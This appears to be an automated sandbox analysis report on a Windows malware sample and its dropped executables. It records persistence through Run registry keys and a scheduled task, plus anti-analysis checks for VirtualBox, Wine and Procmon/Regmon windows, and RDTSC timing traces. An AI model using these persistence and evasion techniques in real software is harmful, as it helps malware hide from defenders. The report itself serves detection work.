                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\1027566001\522bb7a019.exeFile created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\ucrtbase.dllJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75642\msvcp90.dllJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75642\win32ui.pydJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75642\_ctypes.pydJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1027576001\0bf9323d7e.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75642\_socket.pydJump to dropped file
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75642\pywintypes27.dllJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\random[2].exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\freebl3[1].dllJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1027571001\ccb71f0bac.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1027578001\4c4716526e.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1027573001\eIgpINK.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75642\_win32sysloader.pydJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75642\python27.dllJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\random[2].exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75642\tcl85.dllJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75642\pythoncom27.dllJump to dropped file
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeFile created: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75642\mfc90.dllJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B8DE7T9Q\random[1].exeJump to dropped file

                                    Boot Survival

                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run f2a96255ac.exe
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 85c59433f4.exe
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ccb71f0bac.exe
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 8663788bd2.exe
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run f3d6f9fcfe.exe
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunJump to behavior
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeWindow searched: window name: FilemonClassJump to behavior
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeWindow searched: window name: RegmonClassJump to behavior
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeWindow searched: window name: RegmonclassJump to behavior
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeWindow searched: window name: FilemonclassJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeWindow searched: window name: FilemonClassJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeWindow searched: window name: RegmonClassJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeWindow searched: window name: RegmonclassJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeWindow searched: window name: FilemonclassJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exeWindow searched: window name: FilemonClassJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exeWindow searched: window name: RegmonClassJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClassJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClass
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClass
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: Regmonclass
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: Filemonclass
                                    Source: C:\Users\user\Documents\HJEHIJEBKE.exeWindow searched: window name: FilemonClass
                                    Source: C:\Users\user\Documents\HJEHIJEBKE.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                    Source: C:\Users\user\Documents\HJEHIJEBKE.exeWindow searched: window name: RegmonClass
                                    Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeWindow searched: window name: FilemonClass
                                    Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                    Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeWindow searched: window name: RegmonClass
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /delete /tn "AutoRunHTA" /f
                                    Source: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exeFile created: C:\Windows\Tasks\skotes.job
                                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
                                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
                                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
                                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
                                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
                                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
                                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run f3d6f9fcfe.exe
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 8663788bd2.exe
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run f2a96255ac.exe
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 85c59433f4.exe
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ccb71f0bac.exe

                                    Hooking and other Techniques for Hiding and Protection

                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe Process information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exe Process information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe Process information set: NOOPENFILEERRORBOX

                                    Malware Analysis System Evasion

                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
                                    Source: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exe Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exe System information queried: FirmwareTableInformation
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exe System information queried: FirmwareTableInformation
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exe System information queried: FirmwareTableInformation
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exe System information queried: FirmwareTableInformation
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exe File opened: HKEY_CURRENT_USER\Software\Wine
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exe File opened: HKEY_CURRENT_USER\Software\Wine
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                    Source: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exe File opened: HKEY_CURRENT_USER\Software\Wine
                                    Source: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                    Source: C:\Users\user\Documents\HJEHIJEBKE.exe File opened: HKEY_CURRENT_USER\Software\Wine
                                    Source: C:\Users\user\Documents\HJEHIJEBKE.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                    Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe File opened: HKEY_CURRENT_USER\Software\Wine
                                    Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EA6AE1 second address: EA6B1B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 sub dword ptr [ebp+122D2463h], esi 0x0000000f lea ebx, dword ptr [ebp+1245155Bh] 0x00000015 clc 0x00000016 xchg eax, ebx 0x00000017 pushad 0x00000018 js 00007FD358ED110Fh 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EA6B1B second address: EA6B28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
